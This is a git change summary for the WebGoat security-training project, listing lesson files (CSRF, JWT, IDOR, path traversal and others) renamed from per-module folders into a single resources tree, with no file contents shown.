 rename {webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en => src/main/resources/lessons/client_side_filtering/documentation}/ClientSideFiltering_assignment.adoc (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en => src/main/resources/lessons/client_side_filtering/documentation}/ClientSideFiltering_final.adoc (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/en => src/main/resources/lessons/client_side_filtering/documentation}/ClientSideFiltering_plan.adoc (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/html/ClientSideFiltering.html (95%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/images/lesson1_header.jpg (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/images/lesson1_workspace.jpg (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/images/samsung-black.jpg (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/images/samsung-grey.jpg (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/js/clientSideFiltering.js (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/js/clientSideFilteringFree.js (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/lessonSolutions/en/ClientSideFiltering.html (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/lessonSolutions/en/ClientSideFiltering_files/clientside_firebug.jpg (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/Crypto_plan.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/defaults.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/encoding_plan.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/encoding_plan2.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/encryption.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/hashing_plan.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/keystores.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/postquantum.adoc (100%)
 rename {webgoat-lessons/crypto/src/main/resources/lessonPlans/en => src/main/resources/lessons/cryptography/documentation}/signing.adoc (100%)
 rename webgoat-lessons/crypto/src/main/resources/html/Crypto.html => src/main/resources/lessons/cryptography/html/Cryptography.html (82%)
 rename {webgoat-lessons/crypto/src/main/resources => src/main/resources/lessons/cryptography}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/css/reviews.css (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Basic_Get-1.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_ContentType.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Frameworks.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_GET.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Get_Flag.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Impact_Defense.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_JSON.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Login.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_Reviews.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources/lessonPlans/en => src/main/resources/lessons/csrf/documentation}/CSRF_intro.adoc (100%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/html/CSRF.html (91%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/images/login-csrf.png (100%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/js/csrf-review.js (100%)
 rename {webgoat-lessons/csrf/src/main/resources => src/main/resources/lessons/csrf}/js/feedback.js (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en => src/main/resources/lessons/deserialization/documentation}/InsecureDeserialization_GadgetChain.adoc (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en => src/main/resources/lessons/deserialization/documentation}/InsecureDeserialization_Intro.adoc (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en => src/main/resources/lessons/deserialization/documentation}/InsecureDeserialization_SimpleExploit.adoc (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en => src/main/resources/lessons/deserialization/documentation}/InsecureDeserialization_Task.adoc (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources/lessonPlans/en => src/main/resources/lessons/deserialization/documentation}/InsecureDeserialization_WhatIs.adoc (100%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources => src/main/resources/lessons/deserialization}/html/InsecureDeserialization.html (59%)
 rename {webgoat-lessons/insecure-deserialization/src/main/resources => src/main/resources/lessons/deserialization}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons}/employees.xml (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en => src/main/resources/lessons/hijacksession/documentation}/HijackSession_content0.adoc (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources/lessonPlans/en => src/main/resources/lessons/hijacksession/documentation}/HijackSession_plan.adoc (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources => src/main/resources/lessons/hijacksession}/html/HijackSession.html (63%)
 rename {webgoat-lessons/hijack-session/src/main/resources => src/main/resources/lessons/hijacksession}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources => src/main/resources/lessons/hijacksession}/lessonSolutions/en/HijackSession_solution.adoc (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources => src/main/resources/lessons/hijacksession}/lessonSolutions/html/HijackSession.html (100%)
 rename {webgoat-lessons/hijack-session/src/main/resources => src/main/resources/lessons/hijacksession}/templates/hijackform.html (100%)
 rename {webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en => src/main/resources/lessons/html_tampering/documentation}/HtmlTampering_Intro.adoc (100%)
 rename {webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en => src/main/resources/lessons/html_tampering/documentation}/HtmlTampering_Mitigation.adoc (100%)
 rename {webgoat-lessons/html-tampering/src/main/resources/lessonPlans/en => src/main/resources/lessons/html_tampering/documentation}/HtmlTampering_Task.adoc (100%)
 rename {webgoat-lessons/html-tampering/src/main/resources => src/main/resources/lessons/html_tampering}/html/HtmlTampering.html (95%)
 rename {webgoat-lessons/html-tampering/src/main/resources => src/main/resources/lessons/html_tampering}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/html-tampering/src/main/resources => src/main/resources/lessons/html_tampering}/images/samsung.jpg (100%)
 rename {webgoat-lessons/http-basics/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_basics/documentation}/HttpBasics_content1.adoc (100%)
 rename {webgoat-lessons/http-basics/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_basics/documentation}/HttpBasics_content2.adoc (100%)
 rename {webgoat-lessons/http-basics/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_basics/documentation}/HttpBasics_plan.adoc (100%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/html/HttpBasics.html (92%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/i18n/WebGoatLabels_de.properties (100%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/i18n/WebGoatLabels_fr.properties (100%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/i18n/WebGoatLabels_nl.properties (100%)
 rename {webgoat-lessons/http-basics/src/main/resources => src/main/resources/lessons/http_basics}/i18n/WebGoatLabels_ru.properties (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/0overview.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/10burp.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/1proxysetupsteps.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/3browsersetup.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/5configurefilterandbreakpoints.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/6assignment.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/7resend.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/8httpsproxy.adoc (98%)
 rename {webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en => src/main/resources/lessons/http_proxies/documentation}/9manual.adoc (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/html/HttpProxies.html (52%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/breakpoint.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/breakpoint2.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpfilter.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpfilterclient.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpintercept.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpintercepted.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpproxy.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/burpwarn.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/chrome-manual-proxy-win.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/chrome-manual-proxy.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/firefox-proxy-config.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/firefoxsettingscerts.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/importcerts.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/loginscreen.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/newlocalhost.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/proxy-intercept-button.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/proxy-intercept-details.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/rootca.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/savecerts.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap-browser-button.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap-exclude.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap-history.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap-start.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap_edit_and_resend.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap_edit_and_response.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap_edit_and_send.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap_exclude.png (100%)
 rename {webgoat-lessons/http-proxies/src/main/resources => src/main/resources/lessons/http_proxies}/images/zap_exclude_url.png (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_editOtherProfile.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_editOwnProfile.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_inputAltPath.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_intro.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_login.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_mitigation.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_viewDiffs.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_viewOtherProfile.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_viewOwnAltPath.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/IDOR_whatDiffs.adoc (100%)
 rename {webgoat-lessons/idor/src/main/resources/lessonPlans/en => src/main/resources/lessons/idor/documentation}/temp.txt (100%)
 rename {webgoat-lessons/idor/src/main/resources => src/main/resources/lessons/idor}/html/IDOR.html (91%)
 rename {webgoat-lessons/idor/src/main/resources => src/main/resources/lessons/idor}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/idor/src/main/resources => src/main/resources/lessons/idor}/js/idor.js (100%)
 rename {webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en => src/main/resources/lessons/insecure_login/documentation}/InsecureLogin_Intro.adoc (100%)
 rename {webgoat-lessons/insecure-login/src/main/resources/lessonPlans/en => src/main/resources/lessons/insecure_login/documentation}/InsecureLogin_Task.adoc (100%)
 rename {webgoat-lessons/insecure-login/src/main/resources => src/main/resources/lessons/insecure_login}/html/InsecureLogin.html (86%)
 rename {webgoat-lessons/insecure-login/src/main/resources => src/main/resources/lessons/insecure_login}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/insecure-login/src/main/resources => src/main/resources/lessons/insecure_login}/js/credentials.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/css/jwt.css (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/db/migration/V2019_09_25_1__jwt.sql (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_decode.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_final.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_libraries.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_libraries_assignment.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_libraries_assignment2.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_libraries_solution.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_login_to_token.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_mitigation.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_plan.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_refresh.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_refresh_assignment.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_signing.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_signing_solution.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_storing.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_structure.adoc (100%)
 rename {webgoat-lessons/jwt/src/main/resources/lessonPlans/en => src/main/resources/lessons/jwt/documentation}/JWT_weak_keys (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/html/JWT.html (92%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/i18n/WebGoatLabels.properties (100%)
 create mode 100644 src/main/resources/lessons/jwt/images/challenge1-small.png
 create mode 100644 src/main/resources/lessons/jwt/images/challenge2-small.png
 create mode 100644 src/main/resources/lessons/jwt/images/challenge3-small.png
 create mode 100644 src/main/resources/lessons/jwt/images/challenge4-small.png
 create mode 100644 src/main/resources/lessons/jwt/images/challenge5-small.png
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/jerry.png (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/jwt_diagram.png (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/jwt_token.png (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/logs.txt (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/product-icon.png (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/images/tom.png (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/jwt-buy.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/jwt-final.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/jwt-refresh.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/jwt-voting.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/jwt-weak-keys.js (100%)
 rename {webgoat-lessons/jwt/src/main/resources => src/main/resources/lessons/jwt}/js/questions_jwt.json (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/db/migration/V2019_11_10_1__introduction.sql (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-attack.adoc (76%)
 create mode 100644 src/main/resources/lessons/lesson_template/documentation/lesson-template-content.adoc
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-database.adoc (72%)
 create mode 100644 src/main/resources/lessons/lesson_template/documentation/lesson-template-glue.adoc
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-intro.adoc (50%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-lesson-class.adoc (65%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-video-more.adoc (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en => src/main/resources/lessons/lesson_template/documentation}/lesson-template-video.adoc (82%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/html/LessonTemplate.html (79%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/images/firefox-proxy-config.png (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/js/idor.js (100%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/resources => src/main/resources/lessons/lesson_template}/video/sample-video.m4v (100%)
 rename {webgoat-lessons/logging/src/main/resources/lessonPlans/en => src/main/resources/lessons/logging/documentation}/logReading_Task.adoc (100%)
 rename {webgoat-lessons/logging/src/main/resources/lessonPlans/en => src/main/resources/lessons/logging/documentation}/logSpoofing_Task.adoc (100%)
 rename {webgoat-lessons/logging/src/main/resources/lessonPlans/en => src/main/resources/lessons/logging/documentation}/logging_intro.adoc (100%)
 rename {webgoat-lessons/logging/src/main/resources/lessonPlans/en => src/main/resources/lessons/logging/documentation}/more_logging.adoc (100%)
 rename {webgoat-lessons/logging/src/main/resources/lessonPlans/en => src/main/resources/lessons/logging/documentation}/sensitive_logging_intro.adoc (100%)
 rename {webgoat-lessons/logging/src/main/resources => src/main/resources/lessons/logging}/html/LogSpoofing.html (79%)
 rename {webgoat-lessons/logging/src/main/resources => src/main/resources/lessons/logging}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources => src/main/resources/lessons/missing_ac}/css/ac.css (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources => src/main/resources/lessons/missing_ac}/db/migration/V2021_11_03_1__ac.sql (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en => src/main/resources/lessons/missing_ac/documentation}/missing-function-ac-01-intro.adoc (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en => src/main/resources/lessons/missing_ac/documentation}/missing-function-ac-02-client-controls.adoc (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en => src/main/resources/lessons/missing_ac/documentation}/missing-function-ac-03-users.adoc (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources/lessonPlans/en => src/main/resources/lessons/missing_ac/documentation}/missing-function-ac-04-users-fixed.adoc (100%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources => src/main/resources/lessons/missing_ac}/html/MissingFunctionAC.html (89%)
 rename {webgoat-lessons/missing-function-ac/src/main/resources => src/main/resources/lessons/missing_ac}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/css/password.css (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_SecurityQuestions.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_host_header.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_known_questions.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_mitigation.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_plan.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_simple.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources/lessonPlans/en => src/main/resources/lessons/password_reset/documentation}/PasswordReset_wrong_message.adoc (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/html/PasswordReset.html (93%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/images/reset1.png (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/images/reset2.png (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/images/slack1.png (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/images/slack2.png (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/js/password-reset-simple.js (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/templates/password_link_not_found.html (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/templates/password_reset.html (100%)
 rename {webgoat-lessons/password-reset/src/main/resources => src/main/resources/lessons/password_reset}/templates/success.html (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/css/path_traversal.css (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_intro.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_retrieval.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_upload.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_upload_fix.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_upload_fixed.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_upload_mitigation.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_upload_remove_user_input.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_zip_slip.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_zip_slip_assignment.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources/lessonPlans/en => src/main/resources/lessons/path_traversal/documentation}/PathTraversal_zip_slip_solution.adoc (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/html/PathTraversal.html (92%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/account.png (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/1.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/10.jpg (100%)
 rename {webgoat-lessons/path-traversal/src/main/resources => src/main/resources/lessons/path_traversal}/images/cats/2.jpg (100%)
